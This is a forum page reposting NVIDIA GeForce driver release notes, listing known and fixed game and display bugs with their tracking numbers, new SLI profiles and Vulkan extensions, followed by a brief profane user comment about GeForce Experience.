In a multi-display configuration, the extended displays are unable to enter sleep mode. [1902053]
Quote:
Windows 10 Issues
[DirectX 11 games]: On some titles, in-game V-Sync does not work if Fast Sync is selected from the NVIDIA Control Panel. Consequently, the game frame rate is not locked to the maximum refresh rate, resulting in possible tearing. [200304603]
[SteamVR titles]: SteamVR may crash when launched. [1917936]To workaround, uninstall GeForce Experience or reinstall the NVIDIA driver.
[Power DVD 17]: The display may go blank while playing HDR video in exclusive full-screen mode. [200300818]
[GeForce GTX 1070]: Games (Witcher 3, For Honor) do not recognize the custom refresh rates set using the NVIDIA Control Panel. [1916598]
[SLI][GeForce GTX 1080][Battlefield 1 XP1]: With SLI enabled, corruption appears in the game when switching between full-screen and windowed mode. [1889162]
[GeForce GTX 1080 Ti][Mass Effect: Andromeda]: Random memory errors may occur when playing the game. [1887520]
[GeForce GTX 1080 Ti][Sid Meirie's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu after skipping the cutscene. [200283322]
[GeForce GTX Titan X][Ansel][Ghost Recon Wild lands]: With FXAA enabled from the NVIDIA Control Panel, the application crashes when enabling the in-game Ansel UI. [200283194]
[Notebook][GeForce GTX 970M][Tom Clancy's The Division Survival DLC]: Game crashes, pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[Notebook][GeForce GTX 970M][ShadowPlay][For Honor]: The game silently may crash if the intro video is skipped while instant replay is on. [200247313]
[SLI][Notebook][GeForce GTX 970M][Gears of War 4]: Level loading may hang. [1826307]
NVIDIA Control Panel custom color settings are reset to the default after switching a game between windowed and full-screen mode. [1917071]
NVIDIA Control Panel custom color profiles and ICC profiles are lost when using the Microsoft Game Bar. [1904238
Display monitor is unable to enter sleep mode. [19116554]
[GeForce Experience]: Driver installation may fail when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[Notebook][Pascal GPU]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
Driver install/overinstall requires a reboot. [1757931]
Windows 7 Issues
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync
enabled from the NVIDIA Control Panel. [200254350]
[GeForce GTX 1060]: Blue-screen crash occurs pointingto driver (Nvlddmkm.sys) after the system reboots from sleep mode. [1814559]
Changes and fixes issues:
[TITAN X][3D Vision][Windows 10 Creator’s Update]: The Windows Store does not open when 3D Vision is enabled. [1906805]
[GeForce GTX 1080Ti][Prey 2]: Stuttering occurs during gameplay. [1902201]
[GeForce GTX 1070][Windows 10 Creator’s Update]: In multi-display mode, extended monitors cannot be be put into sleep mode. [1916554]
[GeForce GTX 1060]: Blue-screen crash occurs pointing to driver (Nvlddmkm.sys) after the system reboots from sleep mode. [1814559]
[GeForce GTX 970][SLI]: SLI cannot be enable unless Norton 360 is disabled or Windows is booted in Safe Mode. [1919094]
Open issues:
Windows 10
[DirectX 11 games]: On some titles, in-game V-Sync does not work if Fast Sync is selected from the NVIDIA Control Panel. Consequently, the game frame rate is not locked to the maximum refresh rate, resulting in possible tearing. [200304603]
[SteamVR titles]: SteamVR may crash when launched. [1917936] To workaround, uninstall GeForce Experience or reinstall the NVIDIA driver.
[Power DVD 17]: The display may go blank while playing HDR video in exclusive full-screen mode. [200300818]
[GeForce GTX 1070]: Games (Witcher 3, For Honor) do not recognize the custom refresh rates set using the NVIDIA Control Panel. [1916598]
[SLI][GeForce GTX 1080][Battlefield 1 XP1]: With SLI enabled, corruption appears in the game when switching between full-screen and windowed mode. [1889162]
[GeForce GTX 1080 Ti][Mass Effect: Andromeda]: Random memory errors may occur when playing the game. [1887520]
[GeForce GTX 1080 Ti][Sid Meier's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu after skipping the cutscene. [200283322]
[Notebook][GeForce GTX 970M][Tom Clancy's The Division Survival DLC]: Game crashes, pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[Notebook][GeForce GTX 970M][ShadowPlay][For Honor]: The game silently may crash if the intro video is skipped while instant replay is on. [200247313]
[SLI][Notebook][GeForce GTX 970M][Gears of War 4]: Level loading may hang. [1826307]
NVIDIA Control Panel custom color settings are reset to the default after switching a game between windowed and full-screen mode. [1917071]
NVIDIA Control Panel custom color profiles and ICC profiles are lost when using the Microsoft Game Bar. [1904238]
[GeForce Experience]: Driver installation may fail when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[Notebook][Pascal GPU]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
Driver install/overinstall requires a reboot. [1757931]
Windows 7
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
SLI
Bulletstorm: Full Clip Edition
Little Nightmares
PlayerUnknown’s Battlegrounds
Transformers Online
Fixed issues
[DirectX 11 games]: On some titles, in-game V-Sync does not work if Fast Sync is selected from the NVIDIA Control Panel. Consequently, the game frame rate is not locked to the maximum refresh rate, resulting in possible tearing. [200304603]
[Aerofly RC 7]: Corruption occurs in the game when shadows are enabled. [1921628]
[SLI][GeForce GTX]: The secondary display remains blank after switching from Clone or Extended mode to secondary-only display mode. [200288996]
Open issues Win10
[Firefox.exe]: Browser errors may occur or the browser may crash with NVIDIA drivers. [200301372]
[Kepler GPUs][SteamVR]: The compositor fails when starting up. [1929201]
[Power DVD 17]: The display may go blank while playing HDR video in exclusive full-screen mode. [200300818]
[GeForce GTX 1070]: Games (Witcher 3, For Honor) do not recognize the custom refresh rates set using the NVIDIA Control Panel. [1916598]
[SLI][GeForce GTX 1080][Battlefield 1 XP1]: With SLI enabled, corruption appears in the game when switching between full-screen and windowed mode. [1889162]
[GeForce GTX 1080 Ti][Mass Effect: Andromeda]: Random memory errors may occur when playing the game. [1887520]
[GeForce GTX 1080 Ti][Sid Meier's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu after skipping the cutscene. [200283322]
[Notebook][GeForce GTX 970M][Tom Clancy's The Division Survival DLC]: Game crashes, pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[Notebook][GeForce GTX 970M][ShadowPlay][For Honor]: The game silently may crash if the intro video is skipped while instant replay is on. [200247313]
[SLI][Notebook][GeForce GTX 970M][Gears of War 4]: Level loading may hang. [1826307]
[GeForce Experience]: Driver installation may fail when attempting to perform a driver overinstall.
To workaround, perform a clean installation.
[Notebook][Pascal GPU]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
Driver install/overinstall requires a reboot. [1757931]
Win7
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
New extensions:
VK_KHR_get_surface_capabilities2
VK_EXT_sampler_filter_minmax
VK_NV_fill_rectangle
VK_NV_fragment_coverage_to_color
Updated VulkanRT loader to 1.0.49.0
Various performance improvements
Signature/Avatar nuking: none (can be changed in your profile)
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
let me guess, your using that Java crap 3.0 GFE version ...or theirs new even more shit chromium GFE 3.4.xxx BETA 
with Alt+z Share mode ... 
